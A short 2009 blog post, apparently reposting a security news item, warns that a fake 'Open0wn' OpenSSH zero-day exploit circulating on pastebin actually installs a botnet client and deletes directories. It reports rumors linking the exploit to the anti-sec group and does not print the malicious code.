Monday, July 20, 2009

Rogue OpenSSH 0-Day Exploit Damages Computers

The obfuscated code contains malicious instructions and creates a botnet

A fake exploit for a zero-day OpenSSH vulnerability, which was allegedly used in some high-profile attacks, has been circulating on the Internet recently. Compiling and running it is not a good idea, as the code contains instructions to install a botnet client and delete directories from the file system.

About two weeks ago, rumors of the existence of an undisclosed vulnerability in OpenSSH started spreading. A system log showing an attack in progress suggested that a group named "anti-sec" was being in possession of an OpenSSH exploit called "Open0wn," which was being used to compromise Linux and FreeBSD servers.

Not long after, anti-sec took credit for an attack against ImageShack and positioned itself as a contestant of full disclosure and the security industry. Security researchers eventually agreed that these compromises were most likely the result of brute force attacks rather than the exploitation of an OpenSSH vulnerability.

Source code masquerading as the Open0wn exploit has been spotted on pastebin, as well as on other websites, for the past few days now. The fake exploit has three obfuscated code strings, defined as jmpcode[], shellcode[] and fbsd_shellcode[].

Read More

No comments: